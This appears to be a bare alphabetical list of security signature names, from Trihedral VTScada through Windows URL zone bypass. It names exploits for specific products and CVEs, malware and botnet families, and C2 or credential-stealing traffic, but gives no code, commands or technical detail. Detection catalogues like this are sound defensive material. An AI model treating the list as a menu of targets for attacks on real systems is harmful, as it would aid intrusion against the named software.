Trihedral-Vtscada-Wap-Directory-Traversal
Trihedral-Vtscada-Wap-Filter-Bypass
Trihedral-Vtscada-Web-Interface-Integer-Overflow
Trillian-Aim:-URI-Handler-Buffer-Overflow
Trillian-Aim:-URI-Handler-Code-Injection
Trimble-Navigation-SketchUp-BMP-File-Buffer-Overflow
Tripwire-File-Name-Format-String
Trixbox-Directory-Traversal
Trojan-Downloader-MSIL-OnyxDropper-A
Trojan-MSIL-Fergstox-A
Trojan-Shell-Retemuja-A
Trojan-Win32-FraudPack
TrueOnline-Billion-5200W-T-Router-Command-Injection
TrueOnline-ZyXEL-P660HN-T-V1-Router-ViewLog.asp-Command-Injection
TrueOnline-ZyXEL-P660HN-T-V2-Router-logSet.asp-Command-Injection
Trustwave-Holdings-Modsecurity-Chunked-Transfer-Encoding-Policy-Bypass
Tstisapi-DLL-BOF
Tsunami-Linux-Trojan-Infection-Traffic
Ttawebtop-Cgi-File-Disclosure
Tumbleweed-SecureTransport-FileTransfer-ActiveX-Control-Buffer-Overflow
Turbosoft-Turboftp-Server-Port-Command-Buffer-Overflow
TurboVNC-Fence-Message-Stack-Based-Buffer-Overflow
Turla-Backdoor
TVT-NVMS-1000-Directory-Traversal
TWiki-And-Foswiki-MAKETEXT-Remote-Command-Execution
TWiki-Remote-Perl-Code-Execution
TWiki-Search-Function-Command-Execution-Vulnerability
Twister-Music-File-Search-And-Download-Tool
Twitter-TwitterServer-Histogramqueryhandler-Cross-Site-Scripting
TYPO3-CMS-Phar-Insecure-Deserialization
TYPO3-CMS-Sanitizelocalurl-Cross-Site-Scripting
TYPO3-File-Disclosure
TYPO3-Lux-Extension-SQL-Injection
Ubiquiti-Networks-AirOS-Directory-Traversal
Ubiquiti-Networks-AirOS-Remote-Command-Execution-CVE-2010-5330
Ubisoft-Uplay-Arbitrary-Code-Execution
UDP-Ethereal-IAPP-BOF
UDP-MAPI-Microsoft-Exchange-Server-DOS
uftpd-FTP-Server-Port-Command-Handling-Stack-Buffer-Overflow
Ultra-Mini-Httpd-Stack-Based-Buffer-Overflow
Ultra-Office-Control-ActiveX-Control-Stack-Based-Buffer-Overflow
UltraVNC-Authenticate-Buffer-Overflow
UltraVNC-Client-Buffer-Overflow
UltraVNC-File-Transfer-Request-Handler-Stack-Based-Buffer-Overflow
UltraVNC-VNC-Server-File-Transfer-Offer-Handler-Heap-Based-Buffer-Overflow
UltraVNC-Vnclog-Buffer-Overflow
Umbraco-CMS-File-Upload-Stored-Cross-Site-Scripting
Umplayer-Wintab32.dll-Insecure-Library-Loading
Un4seen-XMPlay-Stack-Based-Buffer-Overflow
Unauthenticated-RCE-In-Bricks-Builder-Theme
Unauthenticated-RCE-In-NetAlertX
Unauthenticated-Remote-Code-Execution-In-Ignition
Unicode-Formatting-Control-Characters
Unify-Ewave-Servletexec-Upload
Unisys-Business-Information-Server-Stack-Buffer-Overflow
Unitrends-UEB-api/storage-Remote-Root
Unitrends-UEB-bpserverd-Authentication-Bypass
Unitronics-Unidownloader-And-VisiLogic-OPLC-Ipworksssl-Memory-Corruption
Unitronics-VisiLogic-ActiveX-Out-Of-Bounds-Array-Indexing
Unitronics-VisiLogic-OPLC-ActiveX-Control-Memory-Corruption
Unitronics-VisiLogic-OPLC-IDE-Teepreviewer-ChartLink-Memory-Corruption
Unitronics-VisiLogic-OPLC-IDE-Vlp-File-Parsing-Heap-Buffer-Overflow
Universal-Plug-And-Play-Request
Unix-IFS-Code-Execution
Unix-System-Monitor-Messages
Unknown-Client-Side-Scripting-Filename
Unraid-Auth-Bypass-PHP-RCE
UnrealIRCD-Backdoor-Command-Execution
Untangle-NG-Firewall-execEvil-Command-Injection
Unusual-IP-Address-Format-Used-In-HTTP-Request
Unzip-Extra-Field-Uncompressed-Size-Buffer-Overflow
UPnP-IGD-Apple-Mac-OSX-mDNSResponder-Compromise
UPX-Packed-ELF-Executable
UPX-Packed-Executable
Use-After-Free-Vulnerability-In-Smb-Kernel-Server-Ksmbd-ZDI-22-1690
Ustorekeeper-Cgi-File-Disclosure
uTorrent-Announce-Url-Buffer-Overflow
UUSee-Streaming-Media
V-CMS-PHP-File-Upload-And-Execute-Vulnerability
Valmet-DNA-Predictable-Key-Remote-Code-Execution
Valve-Steam-Usage
Vandyke-AbsoluteFTP-Buffer-Overflow
Vandyke-Securecrt-Configuration-Folder-Vulnerability
Vandyke-Securecrt-SSH-Client-Buffer-Overflow
Vandyke-Vshell-Server-Trigger-Command-Injection
Varnish-Cache-HTTP2-Flow-Control-Denial-Of-Service
Vawtrak-Botnet
VBScript-File-Transfer
VBScript-In-Insecure-Frameworks
VBScript-Scripting-Detected
VBScript_Engine_Use_After_Free_Vulnerability_CVE-2019-1485
vBSEO-Remote-PHP-Code-Injection
VBulletin-Arbitrary-Code-Execution
VBulletin-Formudisplay-Php-Script-Execution
VBulletin-nodeid-SQL-Injection
VBulletin-nodeid-SQL-Injection-CVE-2020-12720
VBulletin-PHP-Object-Injection
VBulletin-Remote-Code-Execution-5.6.x
VBulletin-Remote-Code-Execution-CVE-2019-16759
VBulletin-Routestring-Unauthenticated-Remote-Code-Execution
VBulletin-widgetConfig-RCE
Vcenter-Server-Arbitrary-File-Upload-CVE-2021-22005
Vcenter-Server-VSAN-Health-Check-RCE-CVE-2021-21985
Veeam-Backup-And-Replication-Authentication-Bypass-CVE-2022-26501
Veeam-Backup-And-Replication-CDbCryptoKeyInfo-Insecure-Deserialization
Veeam-Backup-And-Replication-Cproxybinaryformatter-Arbitrary-File-Deletion
Veeam-Backup-And-Replication-Credential-Disclosure-CVE-2023-27532
Veeam-Backup-And-Replication-FindValidSTSEndpointUrl-Authentication-Bypass
Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2024-40711
Veeam-Backup-And-Replication-Insecure-Deserialization-CVE-2025-23120
Veeam-One-Agent-Deserialization
Veeam-One-Reporter-importlicense-Page_Load-XML-External-Entity-Injection
Veeam-One-Ssrsreport-Getcustomelementtext-Xml-External-Entity-Injection
Veertu-Anka-Build-Service-Directory-Traversal
Vegadns-Axfr_Get-Command-Injection
Veil-Evading-Binary
Vercel-Next.js-Improper-URL-Handling-Denial-of-Service
Verisign-MPKI-ConfigChk-ActiveX-Control-Buffer-Overflow
Veritas-Backup-Exec-Agent-Authentication-Bypass
Veritas-Backup-Exec-Agent-Browser-BOF
Veritas-Backup-Exec-Agent-Buffer-Overflow
Veritas-Backup-Exec-Agent-Command-Execution-Vulnerability-CVE-2021-27878
Veritas-Backup-Exec-Agent-Error-Status-Denial-Of-Service
Veritas-Backup-Exec-Agent-Improper-Authentication-Vulnerability-CVE-2021-27877
Veritas-Backup-Exec-Agent-Improper-File-Access-Vulnerability-CVE-2021-27876
Veritas-Backup-Exec-Server-Remote-Registry-Access
Veritas-NetBackup-Java-Authentication-Service-Compromise
Veritas-NetBackup-Remote-Command-Execution
Veritas-NetBackup-Vnetd-Buffer-Overflow
Veritas-NetBackup-Volume-Manager-Daemon-Buffer-Overflow
Versa-Director-Favicon-Unrestricted-File-Upload-CVE-2024-39717
VersalSoft-HTTP-File-Upload-ActiveX-Control-AddFile-Method-Buffer-Overflow
Version-Control-Metafile-Access
Verso-NetPerformer-Telnet-Buffer-Overflow-Vulnerability
Vertexnet-Bot
Very-Large-XML-File
VeryPDF-PDFView-Heap-Overflow
VHD-PTZ-Camera-Firmware-Authentication-Bypass-CVE-2024-8956
VHD-PTZ-Camera-Firmware-Command-Injection-CVE-2024-8957
Viber-URI-Handler-Remote-Code-Execution
VICIDIAL-Authenticated-Remote-Code-Execution
VICIDIAL-Dialer-SQL-And-Command-Injection
VICIDIAL-Multiple-Authenticated-SQLi
Victory-FTP-Server-Denial-Of-Service
Vidar-Malware-Infection-Traffic
VideoLAN-Client-Media-Player-Crafted-M3u-Format-String-Buffer-Overflow
VideoLAN-VLC-ActiveX-Control-Crafted-Parameter-Memory-Corruption
VideoLAN-VLC-AMV-Code-Execution
VideoLAN-VLC-Media-Player-Realtext-File-Buffer-Overflow
VideoLAN-VLC-Media-Player-SMB-Module-Win32AddConnection-Buffer-Overflow
VideoLAN-VLC-Media-Player-SMB-URI-Invalid-Free-Vulnerability
VideoLAN-VLC-Media-Player-Subtitle-Striptags-Heap-Buffer-Overflow
VideoLAN-VLC-Media-Player-WAV-Processing-Integer-Overflow
VideoLAN-VLC-Renamed-Zip-File-Handling-Code-Execution
VideoLAN-VLC-Ty-Processing-Buffer-Overflow
VideoLAN-VLC-XSPF-Memory-Corruption
VideoLAN-VLV-Real.c-Readrealindex-Real-Demuxer-Integer-Overflow
Vim-Modelines-Remote-Command-Execution
Vim-Retab-Integer-Overflow
Vinchin-Backup-And-Recovery-Command-Injection
Vipa-Controls-Winplc7-Recv-Stack-Based-Buffer-Overflow
ViperSoftX-C2-Traffic
Virut-Malware-C2-Traffic
Visam-Vbase-Automation-Base-Gestureconfigurations-External-Entity-Injection
Visam-Vbase-Automation-Base-Layersettings-External-Entity-Injection
Visam-Vbase-Automation-Base-Projektinfo-File-Parsing-External-Entity-Injection
Visam-Vbase-Automation-Base-Webremote-File-Parsing-External-Entity-Injection
Viscom-Software-Image-Viewer-ActiveX-Tifmergemultifiles-Buffer-Overflow
Visual-Basic-Script-ShellCode-Generation
Visual-IRC-JOIN-Command-Response-Handling-Buffer-Overflow
Visual-Mining-Netcharts-Server-Admin-Console-Arbitrary-File-Upload
Visual-Mining-Netcharts-Server-File-Upload-Directory-Traversal
Visual-Mining-Netcharts-Server-Projectcontents-File-Rename-Denial-Of-Service
Visual-Mining-Netcharts-Server-Savefile.jsp-Page-Directory-Traversal
Vjw0rm-Malware-Infection-Traffic
VLC-Httpd-Connection-Header-Format-String-RCE
VLC-Media-Player-ABC-File-Instruction-Field-Parsing-Heap-Overflow
VLC-Media-Player-ABC-File-Parts-Field-Parsing-Heap-Integer-Overflow
VLC-Media-Player-MMS-Plugin-Stack-Buffer-Overflow
VLC-Media-Player-MP4-rdrf-Atom-Buffer-Overflow
VLC-Media-Player-ParseJSS-Heap-Buffer-Overflow
VLC-Media-Player-Plugins-Format-String-Vulnerabilities
VLC-Media-Player-RTSP-Plugin-Stack-Buffer-Overflow
VM2-Sandbox-Protection-Bypass-CVE-2022-36067
VM2-Sandbox-Protection-Bypass-CVE-2023-29017
VM2-Sandbox-Protection-Bypass-CVE-2023-30547
VM2-Sandbox-Protection-Bypass-With-Code-Transformer-CVE-2023-29199
VMTurbo-Operations-Manager-Remote-Command-Execution
VMware-Aria-Operations-For-Logs-Insecure-Deserialization-CVE-2023-20864
VMware-Aria-Operations-For-Networks-Command-Injection-CVE-2023-20887
VMware-Aria-Operations-For-Networks-Exportpdf-Code-Injection
VMware-Aria-Operations-For-Networks-Login-Banner-Stored-Cross-Site-Scripting
VMware-Aria-Operations-For-Networks-Savefiletodisk-Directory-Traversal
VMware-Authorization-Service-User-Credential-Parsing-DOS
VMware-Cloud-Director-Remote-Code-Execution
VMware-Com-API-ActiveX-Control-Buffer-Overflow
VMware-ESX-And-ESXi-Server-Soap-Request-Handling-Denial-Of-Service
VMware-ESXi-Authentication-Bypass-CVE-2024-37085
VMware-ESXi-Remote-Code-Execution-CVE-2021-21974
VMware-Fusion-Guest-VM-Remote-Code-Execution
VMware-HCX-Listextensions-SQL-Injection
VMware-Hyperic-HQ-Groovy-Script-Console-Java-Execution
VMware-IntraProcessLogging-DLL-ActiveX-File-Overwrite
VMware-Multiple-Products-Configurator-Command-Injection
VMware-OVF-Tool-Format-String-Vulnerability
VMware-Remote-Console-HOST-And-MOID-Format-String-Code-Execution
VMware-SD-WAN-Edge-Command-Injection-Vulnerability-CVE-2018-6961
VMware-Server-Directory-Traversal
VMware-Server-Isapi-Extension-Remote-Denial-Of-Service
VMware-Spring-Cloud-Data-Flow-Skipper-Server-Directory-Traversal
VMware-Spring-Cloud-Data-Flow-Skipper-Server-YAML-Insecure-Deserialization
VMware-Spring-Cloud-Gateway-Spel-Code-Injection
VMware-Springsource-Spring-Framework-Class.classloader-Remote-Code-Execution
VMware-User-Credential-Verification-Request-To-Authentication-Server
VMware-Vcenter-Arbitrary-File-Read
VMware-Vcenter-Chargeback-Manager-Remote-Code-Execution
VMware-Vcenter-Server-Authentication-Pointer-Out-of-Range-CVE-2023-20894
VMware-Vcenter-Server-Directory-Service-Authentication-Bypass
VMware-Vcenter-Server-Integer-Underflow-CVE-2024-37079
VMware-Vcenter-Server-Jmx-Remote-Code-Execution
VMware-Vcenter-Server-Out-Of-Bounds-Write-CVE-2024-38812
VMware-Vcenter-Server-Psc-Dataaccesscontroller-Insecure-Deserialization
VMware-Vcenter-Server-Remote-Code-Execution
VMware-Vcenter-Server-Remote-Code-Execution-CVE-2021-21972
VMware-Vcenter-Server-Ssooverrestverifierutil-Denial-Of-Service
VMware-Vcenter-Update-Manager-Directory-Traversal
VMware-Vielib-ActiveX-CreateProcess-Command-Execution
VMware-View-Planner-Logupload-Directory-Traversal
VMware-VNC-Vmwdynresolution-Heap-Buffer-Overflow
VMware-Vrealize-Log-Insight-Directory-Traversal-Vulnerability-CVE-2022-31706
VMware-Vrealize-Operations-Manager-API-Certificate-Upload-Directory-Traversal
VMware-Vrealize-Operations-Manager-API-Server-Side-Request-Forgery
VMware-Workspace-ONE-Access-VMSA-2022-0011-Exploit-Chain
VMware-Workspace-One-Authentication-Bypass-CVE-2022-31656
VMware-Workspace-One-Template-Injection-CVE-2022-22954
VMware-Workstation-ActiveX-Control-Vielib.dll-Command-Execution
VMware-Workstation-ActiveX-Partition-Table-Delete
VNC-Usage
Voipmonitor-SQL-Injection-CVE-2022-24260
Voltronic-Power-Viewpower-Getmodbuspassword-Information-Disclosure
Voltronic-Power-Viewpower-Pro-Automatchmac-Command-Injection
Voltronic-Power-Viewpower-Pro-Selectdevicelistby-SQL-Injection
Voltronic-Power-Viewpower-Pro-Selecteventconfig-SQL-Injection
Voltronic-Power-Viewpower-Pro-UpdateManagerPassword-Authentication-Bypass
Voltronic-Power-Viewpower-Pro-Uploadaction-Unrestricted-File-Upload
VSFTPD-Backdoor-Command-Execution
Vtiger-CRM-Authenticated-Remote-Code-Execution
Vtiger-CRM-PHP-Code-Injection
Vtiger-Install-Module-Remote-Command-Execution
Vundo
VxWorks-Memory-Corruption-Vulnerability-CVE-2019-12255
VxWorks-Memory-Corruption-Vulnerability-CVE-2019-12260
VxWorks-Memory-Corruption-Vulnerability-CVE-2019-12261
VxWorks-Memory-Corruption-Vulnerability-CVE-2019-12263
VxWorks-Stack-Overflow-Vulnerability-CVE-2019-12256
W2B-Online-Banking-SQL-Injection-Vulnerability
W32-Jorik-Sefnit
W32/Brepibot.gen-Malware
W32/Gaobot.worm.gen-Worm-IRC-Activity
W32/Gaobot.worm.gen.by-Malware
W32/Gaobot.worm.gen.d-Malware
W32/Gaobot.worm.gen.e-Malware
W32/Gaobot.worm.gen.j-Malware
W32/Ircbot.gen-Malware
W32/Ircbot.worm!ms05-039-Malware
W32/Ircbot.worm.gen-Malware
W32/Mydoom.bg@mm-Malware
W32/Mydoom@MM
W32/Mytob.gen@mm-Malware
W32/MyWife.d@MM!M24-Malware
W32/Nuwar@mm-Malware
W32/Oscarbot-Malware
W32/Poebot.dam-Malware
W32/Poebot.gen-Malware
W32/Polybot.dr-Activity
W32/Polybot.gen!irc-Malware
W32/Polybot@mm-Malware
W32/Sdbot.g.gen-Malware
W32/Sdbot.worm.gen-Malware
W32/Sdbot.worm.gen.bj-Malware
W32/Sdbot.worm.gen.by-Malware
W32/Spybot.worm.gen.e-Malware
W32/Spybot.worm.gen.f-Malware
W32/Spybot.worm.gen.o-Malware
W3C-Amaya-Web-Browser-Stack-Based-Buffer-Overflow
Waledac-Bot
Waledac-Spambot
WAMP-Webmail-No-Url-File-Inclusion
Wannacry-Ransomware
War-Ftpd-User-Pass-BOF
Watchguard-Pre-Auth-RCE-CVE-2022-26318
Wavelink-Emulation-License-Server-HTTP-Header-Processing-Buffer-Overflow
Wavlink-WN535K2-WN535K3-OS-Command-Injection
Wayboard-Cgi-Directory-Traversal
Wazuh-As_Wazuh_Object-Insecure-Deserialization-CVE-2025-24016
Wazuh-Wazuh-Host-Deny-Command-Injection
WD-My-Cloud-NAS-Command-Injection-Vulnerability
Weak-Diffie-Hellman-Parameters
Web-Content-Scanner-Activity
Web-Dorado-Ecommerce-WD-SQL-Injection
Web-FrontPage-Rad-Reg-DLL-BOF
Web-Oracle-Batch-File-Cmd-Exec
Web-Server-PHP-Injection
Web-Server-Side-Script-Disclosure
WebBBS-Webbbs_Config.pl-Followup-Parameter-Shell-Execution
WebCalendar-Remote-Code-Injection
Webcrossing-WebX-HTTP-POST-Content-Length
Webgate-Embedded-Standard-Protocol-Multiple-Buffer-Overflows
Webgate-Multiple-Products-Wespplaybackctrl-Two-Stack-Buffer-Overflow
Webgate-Wespsdk-Wespdiscovery-Stack-Buffer-Overflow
WebGrabber-ActiveX-Control-Buffer-Overflow
Webkit-getImageData-Buffer-Overflow-CVE-2018-12293
Webkit-Object-Outline-Memory-Corruption
Webkit-Use-After-Free-CVE-2017-7042
WebLog-Expert-Denial-of-Service-CVE-2018-7582
Webmin-Command-Injection-Vulnerability
Webmin-Command-Shell-Index.cgi-Stored-Cross-Site-Scripting
Webmin-Cross-Site-Scripting-CVE-2018-19191
Webmin-File-Manager-RCE
Webmin-File-Parameter-Traversal
Webmin-Package-Updates-Remote-Command-Execution
Webmin-Password-Change.cgi-Backdoor
Webmin-Show.cgi-Command-Execution
Webmin-Upload-Authenticated-RCE
Webmin_Arbitary_File_Disclosure
WebRTC-Heap-Buffer-Overflow-CVE-2022-2294
Website-Admin-Console-Access
Webster-HTTP-Server-Buffer-Overflow
Websvn-Search-Command-Injection
Webui-Mainfile.php-Arbitrary-Command-Injection
Wecon-Levistudio-Address-Name-Heap-Buffer-Overflow
Wecon-Levistudio-Baseset-Bgonoffbitaddr-Stack-Buffer-Overflow
Wecon-Levistudio-Comset-Netipaddr-Stack-Buffer-Overflow
Wecon-Levistudio-Curscridaddr-Stack-Buffer-Overflow
Wecon-Levistudio-Datalogtool-Ini-Parser-Stack-Based-Buffer-Overflow
Wecon-Levistudio-Datalogtool-Stack-Based-Buffer-Overflow
Wecon-Levistudio-G_BMP-Szfilename-Two-Stack-Buffer-Overflow
Wecon-Levistudio-Hmiset-Type-Stack-Buffer-Overflow
Wecon-Levistudio-Installmentset-Installmenttrigaddopen-Stack-Buffer-Overflow
Wecon-Levistudio-MulStatus-Szfilename-Stack-Buffer-Overflow
Wecon-Levistudio-PLC-Type-Heap-Buffer-Overflow
Wecon-Levistudio-Screeninfo-Scrnname-Heap-Buffer-Overflow
Wecon-Levistudio-Shortmessage-Module-Smtext-Stack-Buffer-Overflow
Wecon-Levistudio-String-Content-Heap-Buffer-Overflow
Wecon-LeviStudioU-Address-Mapping-Contraladdr-Stack-Buffer-Overflow
Wecon-LeviStudioU-Address-Mapping-Digitcount-Stack-Buffer-Overflow
Wecon-LeviStudioU-Address-Mapping-Plcaddr-And-Dstaddr-Stack-Buffer-Overflow
Wecon-LeviStudioU-Alarm-Bitaddr-Stack-Buffer-Overflow
Wecon-LeviStudioU-Alarm-Tag-WordAddr-Stack-Buffer-Overflow
Wecon-LeviStudioU-Baseset-Entertime-And-Powerentertime-Stack-Buffer-Overflow
Wecon-LeviStudioU-Baseset-Hminame-Stack-Buffer-Overflow
Wecon-LeviStudioU-Baseset-Scridwordaddr-Stack-Buffer-Overflow
Wecon-LeviStudioU-CharSize-Stack-Buffer-Overflow
Wecon-LeviStudioU-Disc-Tag-WordAddr-Stack-Buffer-Overflow
Wecon-LeviStudioU-Hft-File-Parsing-Stack-Buffer-Overflow
Wecon-LeviStudioU-Hft-File-Stack-Buffer-Overflow
Wecon-LeviStudioU-MultiLink-Bitaddr-Stack-Buffer-Overflow
Wecon-LeviStudioU-MultiLink-WordAddr-Stack-Buffer-Overflow
Wecon-LeviStudioU-Screeninfo-Scrnfile-Heap-Buffer-Overflow
Wecon-LeviStudioU-Trend-WordAddr-Stack-Buffer-Overflow
Wecon-LeviStudioU-Xyset-WordAddr-Stack-Buffer-Overflow
Wecon-Pistudio-Basedll-Textcontent-Stack-Based-Buffer-Overflow
Weintek-Easybuilder-Pro-Cmt-Series-Project-File-Directory-Traversal
WellinTech-Kingscada-Kxnetdispose-Stack-Buffer-Overflow
WellinTech-KingView-Kingmess-Log-File-Parsing-Buffer-Overflow
WellinTech-KingView-SCADA-Heap-Buffer-Overflow
WellinTech-KingView-SCADA-Historyserver.exe-Opcode-3-Heap-Buffer-Overflow
WellinTech-KingView-SCADA-KVWebSvr.dll-ActiveX-Contorl-Heap-Buffer-Overflow
WellinTech-Multiple-Products-Kxclientdownload-ActiveX-Remote-Code-Execution
WePresent-WiPG-1000-Command-Injection
Werkzeug-Debugger-Remote-Code-Execution
Western-Digital-Arkeia-Remote-Code-Execution
Western-Digital-Arkeia-Unauthenticated-Script-Upload
Western-Digital-Multiple-Routers-Information-Disclosure
Western-Digital-MyCloud-Multi_uploadify-File-Upload-Vulnerability
Western-Digital-MyCloud-Unauthenticated-Command-Injection
WhatsUp-Gold-Registry-Overwrite-CVE-2024-8785
Wibu-Systems-Wibukey-Runtime-For-Windows-ActiveX-Control-Buffer-Overflow
WIKID-2fa-Enterprise-Server-ADM_usrs.jsp-Cross-Site-Scripting
WIKID-2fa-Enterprise-Server-Getdomainhash-Stored-Cross-Site-Scripting
WIKID-2fa-Enterprise-Server-Groups.jsp-Cross-Site-Scripting
WIKID-2fa-Enterprise-Server-InitDevice-Stored-Cross-Site-Scripting
WIKID-2fa-Enterprise-Server-Log.jsp-SQL-Injection
WIKID-2fa-Enterprise-Server-Preregister-Stored-Cross-Site-Scripting
WIKID-2fa-Enterprise-Server-Processpref.jsp-SQL-Injection
WIKID-2fa-Enterprise-Server-Searchdevices.jsp-SQL-Injection
WikkaWiki-Remote-PHP-Injection
WildFly-Jboss-Undertow-Directory-Traversal
Win-FTP-Server-Wftpsrv.exe-List-FTP-Command-Buffer-Overflow
Win32-OTF-Validation-Vulnerability
Win32.Adware.Hotclip.A-Botnet
Win32.Adware.Marketscore.B-Botnet
Win32.Adware.MediaGet-Botnet
Win32.Adware.SProtector.A-Botnet
Win32.Adware.WebCake-Botnet
Win32.Backdoor.Alusins.A-Botnet
Win32.Backdoor.Bifrose.IQ-Botnet
Win32.Backdoor.Golbrnd.A-Botnet
Win32.Backdoor.Heloag-Botnet
Win32.Backdoor.Hupigon-Botnet
Win32.Backdoor.Pontoeb.A-Botnet
Win32.BankingTrojan.Torpplar.A-Botnet
Win32.Downloader.Loadmoney-Botnet
Win32.Downloader.Malat-Botnet
Win32.Downloader.Microjoin.gen_C-Botnet
Win32.Downloader.Multidropper-Botnet
Win32.Downloader.Pabueri.A-Botnet
Win32.Downloader.Skyflas.A-Botnet
Win32.Downloader.Tijcont.A-Botnet
Win32.PasswordStealer.Fareit-4-Botnet
Win32.PasswordStealer.Mantal.A-Botnet
Win32.ScareWare.CryptKeeper-Botnet
Win32.ScareWare.Ransom.KC-Botnet
Win32.Spyware.Ranbyus.G-Botnet
Win32.Trojan.Avgesi-Botnet
Win32.Trojan.BadBind-Botnet
Win32.Trojan.Bumat-rts-Botnet
Win32.Trojan.Droidpak-Botnet
Win32.Trojan.Eupuds-Botnet
Win32.Trojan.Hanove.F-Botnet
Win32.Trojan.Heur-Botnet
Win32.Trojan.HeurGeneric-Botnet
Win32.Trojan.Injector-2-Botnet
Win32.Trojan.Kovter.B-Botnet
Win32.Trojan.Lumbko.A-Botnet
Win32.Trojan.Psyme.Gen-Botnet
Win32.Trojan.Scar.O-Botnet
Win32.Trojan.SHeur4.BHUE-Botnet
Win32.Trojan.Simda.bqz-Botnet
Win32.Trojan.Smoaler-Botnet
Win32.Trojan.Sydigu-Botnet
Win32.Trojan.Tobfy-Botnet
Win32.Trojan.Xorpix.bh-Botnet
Win32.Trojan.Zusy.24405-Botnet
Win32.Virus.Obfuscator.AJK-Botnet
Win32.Worm.Mofei.P-Botnet
Win32.Worm.Taterf.B-Botnet
Win32k-Elevation-of-Privilege-Vulnerability-CVE-2018-8453
Winace-Rar-And-Tar-Directory-Traversal-Vulnerability
Winamp-Id3v2-Tag-Handling-Buffer-Overflow
Winamp-In-CDDA.dll-Buffer-Overflow
Winamp-Playlist-Buffer-Overflow
Winamp-XM-File-Heap-Overflow
WinCC-Hmiload-Exe-Directory-Traversal
WinComLPD-Total-Integer-Overflow
Windfind
Windows-Command-Prompt
Windows-CryptoAPI-Spoofing-Vulnerability-CVE-2022-34689
Windows-Cryptographic-Services-Remote-Code-Execution-CVE-2023-23416
Windows-Dnsapi-Remote-Code-Execution-Vulnerability
Windows-Elevation-Of-Privilege-CVE-2017-0024
Windows-Elevation-Of-Privilege-CVE-2017-0026
Windows-Elevation-Of-Privilege-CVE-2017-0050
Windows-Elevation-of-Privilege-Vulnerability-CVE-2016-0040
Windows-Environment-Variables-In-Script
Windows-Explorer-HTA-CLSID-System-Compromise
Windows-Explorer-LNK-Remote-Code-Execution-Vulnerability-CVE-2017-8464
Windows-Filename-Parsing-Vulnerability-CVE-2012-4774
Windows-GPP-Password-Elevation-of-Privilege-Vulnerability-CVE-2014-1812
Windows-Graphics-Rendering-Engine-BMP-File-Parsing-Integer-Overflow
Windows-HTML-Platforms-Security-Feature-Bypass
Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2022-24502
Windows-HTML-Platforms-Security-Feature-Bypass-CVE-2025-21269
Windows-HTTP.sys-DOS-Vulnerability-CVE-2013-1305
Windows-ICS-DHCP-Buffer-Overflow-CVE-2023-38148
Windows-Kerberos-Elevation-Of-Privilege-Vulnerability-CVE-2022-33679
Windows-Kerberos-Security-Feature-Bypass-CVE-2025-29809
Windows-Kernel-cng.sys-Buffer-Overflow-CVE-2020-17087
Windows-Local-Privilege-Escalation-CVE-2016-0167
Windows-Malware-Filename
Windows-Mark-Of-The-Web-Bypass-CVE-2024-38213
Windows-Mark-Of-The-Web-Security-Feature-Bypass-CVE-2025-24061
Windows-Media-Center-RCE-CVE-2015-6127
Windows-Media-Center-RCE-CVE-2015-6131
Windows-Media-Decompression-Vulnerability-CVE-2013-0077
Windows-Media-HTTP-Stream-Download
Windows-Media-Player-CVE-2017-0042
Windows-Media-Player-Remote-Code-Execution-CVE-2010-0818
Windows-Media-Runtime-Heap-Corruption-CVE-2009-2525
Windows-Media-Runtime-Voice-Sample-Rate-Code-Execution-CVE-2009-0555
Windows-Media-Services-MX_STATS_LogLine-NSIISlog-DLL-BOF
Windows-Media-Services-NSIISlog-DLL-BOF
Windows-Memory-Disclosure-CVE-2017-0038
Windows-MFT-File-Name-Crash
Windows-Mixed-Reality-Developer-Tools-Information-Disclosure
Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-38112
Windows-MSHTML-Platform-Spoofing-Vulnerability-CVE-2024-43573
Windows-MSRPC-SRVSVC-Unicode-Buffer-Overflow
Windows-Network-File-System-Remote-Code-Execution-Vulnerability-CVE-2023-24941
Windows-NFS-Service-RCE-CVE-2022-24491
Windows-NFS-Service-RCE-CVE-2022-24497
Windows-Null-Session
Windows-OLE-Automation-For-VBScript-Scripting-Engine-CVE-2016-3375
Windows-OLE-Remote-Code-Execution-Vulnerability-CVE-2023-29325
Windows-Out-Of-Bounds-Vulnerability-CVE-2017-11906
Windows-PDF-Information-Disclosure-CVE-2016-3201
Windows-PDF-Information-Disclosure-CVE-2016-3215
Windows-PDF-Library-CVE-2016-3370
Windows-PDF-Remote-Code-Execution-CVE-2016-3203
Windows-RDP-Client-Information-Disclosure-Vulnerability-CVE-2019-1108
Windows-RDP-Information-Disclosure-Vulnerability-CVE-2020-16896
Windows-RDP-Remote-Code-Execution-CVE-2019-0708
Windows-Remote-Desktop-Licensing-Service-Information-Disclosure-Vulnerability
Windows-Remote-Desktop-Services-Remote-Code-Execution-CVE-2025-27480
Windows-Remote-Directory-Listing
Windows-Remote-Management-Activity
Windows-RPC-Locator-BOF-MS03-001
Windows-RSH-Daemon-Buffer-Overflow
Windows-Schannel-Denial-Of-Service-CVE-2023-21818
Windows-Schannel-Denial-Of-Service-Vulnerability-CVE-2023-21819
Windows-Script-File-Transfer
Windows-Scripting-Engine-Memory-Corruption-CVE-2016-3205
Windows-Scripting-Engine-Memory-Corruption-CVE-2016-3206
Windows-Scripting-Engine-Memory-Corruption-CVE-2016-3207
Windows-Scripting-Engine-Memory-Corruption-CVE-2018-8552
Windows-Scripting-Languages-Remote-Code-Execution-CVE-2022-41118
Windows-Search-Service-Out-Of-Bounds-Vulnerability-CVE-2017-8543
Windows-Secure-Channel-Denial-Of-Service-CVE-2024-38148
Windows-Services-NFS-ONCRPC-Xdr-Driver-Information-Disclosure-CVE-2022-21993
Windows-Shell-Remote-Code-Execution-Vulnerability-CVE-2018-8495
Windows-Shell-Shortcut-Arbitrary-Code-Execution
Windows-SMB-Client-Response-Parsing-Vulnerability-CVE-2011-0660
Windows-SMB-Denial-Of-Service-Vulnerability-CVE-2024-43642
Windows-SMB-Open2-Request-Error-Handling-Memory-Corruption
Windows-SMB-Remote-Code-Execution-Vulnerability
Windows-SMB-Trans-Request-Error-Handling-Memory-Corruption
Windows-Smbexec-Service-Create-Start-Command-Execution
Windows-Task-Scheduler-Job-File-System-Compromise
Windows-TCP-IP-Remote-Code-Execution-CVE-2024-38063
Windows-Telnet-Service-Buffer-Overflow-Vulnerability-CVE-2015-0014
Windows-Theme-API-Remote-Code-Execution-Vulnerability-CVE-2018-8413
Windows-Theme-File-Remote-Code-Execution-Vulnerability
Windows-Theme-File-VisualStyles-SMB-Path
Windows-URL-Zone-Check-Bypass-CVE-2023-29324
